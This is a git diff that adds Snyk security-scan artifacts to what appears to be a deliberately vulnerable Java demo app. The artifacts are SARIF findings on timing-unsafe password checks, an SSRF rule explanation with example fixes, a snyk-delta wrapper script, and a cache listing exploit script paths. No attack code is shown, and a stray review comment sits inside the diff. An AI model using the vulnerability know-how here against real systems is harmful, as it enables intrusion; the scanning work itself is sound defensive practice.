2, + "physicalLocation": { + 
"artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 19 + } + } + } + }, + { + "location": { + "id": 3, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 69 + } + } + } + }, + { + "location": { + "id": 4, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 7, + "endColumn": 97 + } + } + } + }, + { + "location": { + "id": 5, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 1, + "endColumn": 97 + } + } + } + }, + { + "location": { + "id": 6, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 13, + "endLine": 13, + "startColumn": 15, + "endColumn": 18 + } + } + } + }, + { + "location": { + "id": 7, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 13, + "endLine": 13, + "startColumn": 1, + "endColumn": 14 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 534, + "priorityScoreFactors": [ + { + "label": true, + "type": "hotFileCodeFlow" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + }, + { + "ruleId": "java/ReturnsPassword", + "ruleIndex": 1, + "level": "warning", + "message": { + "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. 
When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "arguments": [] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 250, + "endLine": 250, + "startColumn": 17, + "endColumn": 50 + } + } + } + ], + "fingerprints": { + "0": "321c85af98d01d74e11fa5dbd45f05d79b2a8850b63a02c1da64df28bfa00cdc", + "1": "ec2603c1.d33f1a8f.d308627b.9998adc9.dd06b926.349570c1.6ae0062a.02370d47.ec2603c1.d33f1a8f.fc7d5400.9998adc9.dd06b926.349570c1.6ae0062a.02370d47" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 250, + "endLine": 250, + "startColumn": 17, + "endColumn": 50 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 617, + "priorityScoreFactors": [ + { + "label": true, + "type": "multipleOccurrence" + }, + { + "label": true, + "type": "hotFileSource" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + }, + { + "ruleId": "java/ReturnsPassword", + "ruleIndex": 1, + "level": "warning", + "message": { + "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. 
When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "arguments": [] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 254, + "endLine": 254, + "startColumn": 17, + "endColumn": 54 + } + } + } + ], + "fingerprints": { + "0": "5a6e18b33f52d656e45141c69fb41d4f9763dad06f518bac9d79f375ee50b600", + "1": "daf8aa0f.ebc140b8.d308627b.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47.daf8aa0f.ebc140b8.fc7d5400.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 254, + "endLine": 254, + "startColumn": 17, + "endColumn": 54 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 617, + "priorityScoreFactors": [ + { + "label": true, + "type": "multipleOccurrence" + }, + { + "label": true, + "type": "hotFileSource" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + } + ], + "properties": { + "coverage": [ + { + "isSupported": true, + "lang": "HTML", + "files": 10, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "Java", + "files": 36, + "type": "SUPPORTED" + }, + { + 
"isSupported": true, + "lang": "XML", + "files": 14, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "Python", + "files": 2, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "JavaScript", + "files": 6, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "Java Server Pages", + "files": 12, + "type": "SUPPORTED" + } + ] + } + } + ] +} diff --git a/test.json b/test.json new file mode 100644 index 0000000000..34a147d0cb --- /dev/null +++ b/test.json 
@@ -0,0 +1,511 @@ +{ + "id": "python/Ssrf", + "name": "Ssrf", + "shortDescription": { + "text": "Server-Side Request Forgery (SSRF)" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. 
Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", + "text": "" + }, + "properties": { + "tags": [ + "python", + "Ssrf", + "Security", + "SourceNonServer", + "SourceLocalEnv", + "SourceCLI", + "Taint" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", + "lines": [ + { + "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", + "lineNumber": 31, + "lineChange": "removed" + }, + { + "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", + "lineNumber": 32, + "lineChange": "removed" + }, + { + "line": " args = parser.parse_args()\n", + "lineNumber": 33, + "lineChange": "removed" + }, + { + "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", + "lineNumber": 31, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " request = requests.get(args.zip_url, stream=True)\n", + "lineNumber": 36, + "lineChange": "removed" + }, + { + "line": " request = requests.get(url, stream=True)\n", + "lineNumber": 34, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", + "lines": [ + { + "line": "def get_magnet_link(movie_name = 'harry potter'):\n", + "lineNumber": 32, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 33, + 
"lineChange": "added" + }, + { + "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", + "lineNumber": 34, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "def get_torrent_url(search_url):\n", + "lineNumber": 40, + "lineChange": "removed" + }, + { + "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", + "lineNumber": 41, + "lineChange": "removed" + }, + { + "line": " search_request_response = requests.get(search_url, verify=False)\n", + "lineNumber": 42, + "lineChange": "removed" + }, + { + "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", + "lineNumber": 44, + "lineChange": "removed" + }, + { + "line": " resp = requests.get(URL)\n", + "lineNumber": 36, + "lineChange": "added" + }, + { + "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", + "lineNumber": 37, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", + "lines": [ + { + "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 23, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 24, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 25, + "lineChange": "removed" + }, + { + "line": "from htk.utils import htk_setting\n", + "lineNumber": 23, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 24, + 
"lineChange": "added" + }, + { + "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", + "lineNumber": 25, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 26, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 27, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 28, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": "class Usage(Exception):\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " def __init__(self, msg):\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " self.msg = msg\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": "def main(argv = None):\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " OPT_STR = 'hgr'\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " OPT_LIST = [\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " 'help',\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " 'geocode',\n", + "lineNumber": 38, + "lineChange": "none" + }, + { + "line": " 'resolve',\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": " ]\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " if argv is None:\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " argv = sys.argv\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 44, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 
45, + "lineChange": "none" + }, + { + "line": " progname = argv[0]\n", + "lineNumber": 46, + "lineChange": "none" + }, + { + "line": " opts, args = getopt.getopt(argv[1:],\n", + "lineNumber": 47, + "lineChange": "none" + }, + { + "line": " OPT_STR,\n", + "lineNumber": 48, + "lineChange": "none" + }, + { + "line": " OPT_LIST)\n", + "lineNumber": 49, + "lineChange": "none" + }, + { + "line": " except getopt.error, msg:\n", + "lineNumber": 50, + "lineChange": "none" + }, + { + "line": " raise Usage(msg)\n", + "lineNumber": 51, + "lineChange": "none" + }, + { + "line": " # process options\n", + "lineNumber": 52, + "lineChange": "none" + }, + { + "line": " for o, a in opts:\n", + "lineNumber": 53, + "lineChange": "none" + }, + { + "line": " if o in ('-h', '--help'):\n", + "lineNumber": 54, + "lineChange": "none" + }, + { + "line": " print __doc__\n", + "lineNumber": 55, + "lineChange": "none" + }, + { + "line": " sys.exit(0)\n", + "lineNumber": 56, + "lineChange": "none" + }, + { + "line": " elif o in ('-g', '--geocode'):\n", + "lineNumber": 57, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 58, + "lineChange": "none" + }, + { + "line": " elif o in ('-r', '--resolve'):\n", + "lineNumber": 59, + "lineChange": "none" + }, + { + "line": " is_geocode = False\n", + "lineNumber": 60, + "lineChange": "none" + }, + { + "line": " if is_geocode and len(args) == 1:\n", + "lineNumber": 61, + "lineChange": "none" + }, + { + "line": " address = args[0]\n", + "lineNumber": 62, + "lineChange": "none" + }, + { + "line": " latitude, longitude = get_latlng(address)\n", + "lineNumber": 63, + "lineChange": "none" + }, + { + "line": " print '%s,%s' % (latitude, longitude,)\n", + "lineNumber": 64, + "lineChange": "none" + }, + { + "line": " elif not is_geocode and len(args) == 2:\n", + "lineNumber": 65, + "lineChange": "none" + }, + { + "line": " latitude = args[0]\n", + "lineNumber": 66, + "lineChange": "none" + }, + { + "line": " longitude = args[1]\n", + 
"lineNumber": 67, + "lineChange": "none" + }, + { + "line": " address = reverse_geocode(latitude, longitude)\n", + "lineNumber": 68, + "lineChange": "none" + }, + { + "line": " print address\n", + "lineNumber": 69, + "lineChange": "none" + }, + { + "line": " else:\n", + "lineNumber": 70, + "lineChange": "none" + }, + { + "line": " raise Usage('Incorrect arguments')\n", + "lineNumber": 71, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 72, + "lineChange": "none" + }, + { + "line": " except Usage, err:\n", + "lineNumber": 73, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, err.msg\n", + "lineNumber": 74, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, \"for help use --help\"\n", + "lineNumber": 75, + "lineChange": "none" + }, + { + "line": " return 3.14159\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": "def get_latlng(address):\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " address_query = urllib.quote(address, '')\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": " values = {\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " 'format' : 'json',\n", + "lineNumber": 79, + "lineChange": "none" + }, + { + "line": "'sensor' : 'false',\n", + "lineNumber": 80, + "lineChange": "none" + }, + { + "line": "'address' : address_query,\n", + "lineNumber": 81, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 82, + "lineChange": "none" + }, + { + "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", + "lineNumber": 83, + "lineChange": "removed" + }, + { + "line": " response = requests.get(url)\n", + "lineNumber": 84, + "lineChange": "removed" + }, + { + "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", + "lineNumber": 83, + "lineChange": "added" + }, + { + "line": " if key:\n", + 
"lineNumber": 84, + "lineChange": "added" + }, + { + "line": " params['key'] = key\n", + "lineNumber": 85, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 86, + "lineChange": "added" + }, + { + "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", + "lineNumber": 87, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 4, + "cwe": [ + "CWE-918" + ] + } +} diff --git a/test.sh b/test.sh new file mode 100755 index 0000000000..3a6fa0ce7a --- /dev/null +++ b/test.sh 
@@ -0,0 +1,85 @@
+#!/bin/bash
+
+# Call this script as you would call snyk test | snyk-delta, minus the --all-projects and --json flags
+# This is an interim fix until snyk-delta supports all projects itself (or snyk supports a --new flag)
+# example: /bin/bash snyk_delta_all_projects.sh --severity=high --exclude=tests,resources -- -s config.yaml
+# runs snyk test --all-projects --json $*
+# requires jq to be installed
+
+set -euo pipefail
+
+exit_code=0
+snyk_test_json=''
+formatted_json=''
+args=("$*")
+
+run_snyk_delta () {
+ # add in any other arguments you would like to use
+ snyk-delta
+}
+
+run_snyk_test () {
+ echo "Running: snyk test --all-projects --json" $args
+ local snyk_exit_code=0
+ {
+
+ snyk_test_json=`snyk test --all-projects --json $args`
+
+ } || {
+ snyk_exit_code=$?
+ if [ $snyk_exit_code -eq 2 ]
+ then
+ echo 'snyk test command was not successful, retry with -d to see more information'
+ exit 2
+ fi
+ }
+
+
+}
+
+format_snyk_test_output() {
+ echo "Procesing snyk test --json output"
+ {
+ formatted_json=`echo $snyk_test_json | jq -r 'if type=="array" then .[] else . end | @base64'`
+ } || {
+ echo 'failed to process snyk-test result'
+ exit 2
+ }
+}
+
+
+#######
+# 1. run snyk test
+run_snyk_test
+
+# 2. format results to support single & multiple results returned
+format_snyk_test_output
+
+# 3. call snyk-delta for each result
+for test in `echo $formatted_json`; do
+ single_result="$(echo ${test} | base64 -d)" # use "base64 -d -i" on Windows, which will ignore any "gardage" characters echoing may add
+ project_name="$(echo ${single_result} | jq -r '.displayTargetFile')"
+ echo 'Processing: ' ${project_name}
+ if echo ${single_result} | run_snyk_delta
+ then
+ project_exit_code=$?
+ echo 'Finished processing'
+ else
+ project_exit_code=$?
+ if [ $project_exit_code -gt 1 ]
+ then
+ echo 'snyk-delta encountered an error, retrying.'
+ echo ${single_result} | run_snyk_delta
+ fi
+ echo 'Finished processing'
+ fi
+
+ if [ $project_exit_code -gt $exit_code ]
+ then
+ exit_code=$project_exit_code
+ fi
+ echo "Project: ${project_name} | Exit code: ${project_exit_code}"
+done
+
+echo "Overall exit code for snyk-delta-all-projects.sh: ${exit_code}"
+exit $exit_code
diff --git a/test2.json b/test2.json
new file mode 100644
index 0000000000..1652bc2a7d
--- /dev/null
+++ b/test2.json
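Review bot: `args=("$*")` joins every caller argument into one array element and the unquoted `$args` in `run_snyk_test` then re-splits that string on whitespace, so an argument containing a space (a path given to `--exclude` or `-s`) is mangled before it reaches `snyk test`; use `args=("$@")` and `snyk_test_json=$(snyk test --all-projects --json "${args[@]}")`. The same unquoted expansion of `${single_result}` in the `echo ... | jq` and both `echo ... | run_snyk_delta` pipelines lets the shell word-split and glob-expand the JSON it is forwarding, so it should be `"${single_result}"` in all three places. The retry path also discards its own outcome: under `set -e -o pipefail` a second failure of the pipeline aborts the whole loop instead of being recorded, and a success leaves `project_exit_code` at the first error's value, whereas `project_exit_code=0; echo "${single_result}" | run_snyk_delta || project_exit_code=$?` captures both cases. In the `then` branch `$?` is always 0 because the `if` condition just succeeded, so that assignment is clearer as `project_exit_code=0`.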
@@ -0,0 +1,108 @@ +{ + "vulnerabilities": [], + "ok": true, + "dependencyCount": 0, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "projectId": "6bb333cc-0ffb-4f07-924f-c128d54c1c12", + 
"ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": true, + "uniqueCount": 0, + "projectName": "io.github.snyk:java-goof", + "foundProjectCount": 7, + "displayTargetFile": "pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" +} diff --git a/todolist-goof/.dccache b/todolist-goof/.dccache new file mode 100644 index 0000000000..290fe3d023 --- /dev/null +++ b/todolist-goof/.dccache 
@@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/zip-slip.py":[408,1707749068007.4468,"a818fc2527938e1da045c776d60ba3816f6895a2cc3c704d533f6a18376bebf1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Docu
ments/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/MET
A-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3dfea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,170774
